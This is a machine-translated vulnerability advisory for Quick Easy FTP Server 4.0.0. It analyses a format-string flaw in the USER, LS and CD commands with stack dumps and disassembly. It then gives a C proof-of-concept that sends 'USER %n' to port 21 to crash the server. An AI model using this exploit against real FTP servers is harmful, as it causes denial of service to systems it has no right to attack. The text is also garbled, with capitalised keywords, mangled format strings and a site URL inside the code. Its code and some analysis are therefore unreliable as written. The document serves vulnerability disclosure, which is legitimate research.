Quick easy ftp server 4.0.0 multiple command formatting String Vulnerability

Version: Quick easy ftp server 4.0.0 (not tested in other versions)

Test: W2K SP4

Quick easy ftp server 4.0.0 is not safe to use the wsprintfA function for string operations, resulting in the formatting String Vulnerability. The affected Commands include LS, CD, and USER. The USER command does not need to have a valid account.

The following is a brief analysis:

For submission Username: % x % n

The STACK layout when reading parameters is as follows:

0012FCC0 011652E8 ASCII "02/10/2011 22:33:20. 296 (000001) ", TAB,"-(not logged in) ", TAB," (127.0.0.1)> ", TAB, "USER % x % n"
0012FCC4 01167670-> % x
0012FCC8 01164F60 ASCII "(000001)", TAB, "-(not logged in)", TAB, "(127.0.0.1)>", TAB, "USER % x % n"-> % x
0012 FCCC 0012FD88-> % x
0012FCD0 004147B0 ftpserve.004147B0-> % x
0012FCD4 312F3230-> % n

0012FCC4 01167670-points to a virtual function table.
The following code is available in subsequent calls:
00366f13 |. 8B06 | mov eax, dword ptr [esi]
00366f15 |. 8BCE | mov ecx, esi
00366f17 |. FF90 B0000000 | call dword ptr [eax + B0] -- The eax is a controllable value, that is, the value written to % n.
However, because the value cannot be larger (at least reach the stack space) by formatting the string at the first position of the parameter, it cannot be used.

0012 FCCC 0012FD88-> % x put EBP in this position, and then assign the value written by % n to EBP when the stack is restored. The following code crashes:

00450844 |. 8945 FC mov dword ptr [ebp-4], eax
00450847 |> 8B45 FC mov eax, dword ptr [ebp-4]-program crash, access violation (ebp is very small at this time)
0034784a |. 5E pop esi
00000084b |. C9 leave
00000084c \. C2 0C00 retn 0C

Because leave commands are equivalent
Mov esp, ebp
Pop ebp-Note: Compared with esp, POP is equivalent to add esp, 4.

Similar to off-by-one, in retn 0c, we may be able to get a chance to execute shellcode.

It is found that the length of the submitted USER field value is limited to a very short value, and this pointer is generally unavailable.

1. Check that there is no original string submitted in the stack, and there is no chance to select an address (in fact, but the address in the stack cannot be reached by the wsprintfA function). There is no chance to select an address.
2. Investigate the s.e.h.264 attack chain, which is far away from the vulnerability trigger code and seriously lacks the number of characters given. Therefore, the chain node cannot be modified.
3. It is difficult to place shellcode in the thread and it has no practical significance.

At my level, I can only achieve the effect of D. O.S.

USER command vulnerability test code (D. O.S)

# Include <stdio. h>
# Include <winsock2.h>
# Include <windows. h>
# Pragma comment (lib, "ws2_32.lib ")

Int SendPayload (char * lpHost, int intPort, char * lpPayload, int intSize );

Int main (int argc, char * argv [])
{
If (argc! = 2)
{
Printf ("Quick easy ftp server 4.0.0 USER command formatting String Vulnerability (D. O.S) POC \ r \ n ");
Printf ("contact: ylbhz@hotmail.com ");
Printf ("C :\> exp [ip address] \ r \ n ");
Return 0;
}
Char strHost [20] = {0 };
Strcpy (strHost, argv [1]);
Char lpBuf [] = "USER % n \ r \ n ";

SendPayload (strHost, 21, lpBuf, lstrlenA (lpBuf ));
 
Return 0; www.2cto.com
}

Int SendPayload (char * lpHost, int intPort, char * lpPayload, int intSize)
{
SOCKET sock;
Struct sockaddr_in client;
WSADATA wsa;

Printf ("[*] Init socket... \ r \ n ");
If (WSAStartup (MAKEWORD (2, 2), & wsa )! = 0)
{
Printf ("[-] WSAStartup Error! \ R \ n ");
Return-1;
}
Try
{
Client. sin_addr.S_un.S_addr = inet_addr (lpHost );
Client. sin_family = AF_INET;
Client. sin_port = htons (intPort );
} Catch (...)
{
Printf ("[-] socket_inaddr init error! \ R \ n ");
Return-1;
}
Sock = socket (AF_INET, SOCK_STREAM, 0 );
If (sock = SOCKET_ERROR)
{
Printf ("[-] socket create error! \ R \ n ");
WSACleanup ();
Return-1;
}
Printf ("[+] Socket Init success! \ R \ n ");

Printf ("[*] Connect the Server... \ r \ n ");
If (connect (sock, (struct sockaddr *) & client, sizeof (client) = SOCKET_ERROR)
{
Printf ("[-] Connect Error! \ R \ n ");
Closesocket (sock );
WSACleanup ();
Return-1;
}
Printf ("[+] Connect successfull! \ R \ n ");

Printf ("[*] Send Payload! \ R \ n ");
Int intLen = send (sock, lpPayload, intSize, 0 );
If (intLen <= 0) printf ("[-] Send Payload Error! \ R \ n ");
Else printf ("Send % d bytes \ r \ n", intLen );
Char strBuf [1024] = {0 };
IntLen = recv (sock, strBuf, 1024, 0 );

Printf ("[*] Close Socket! \ R \ n ");
Closesocket (sock );

Return 0;
}

From: painful belief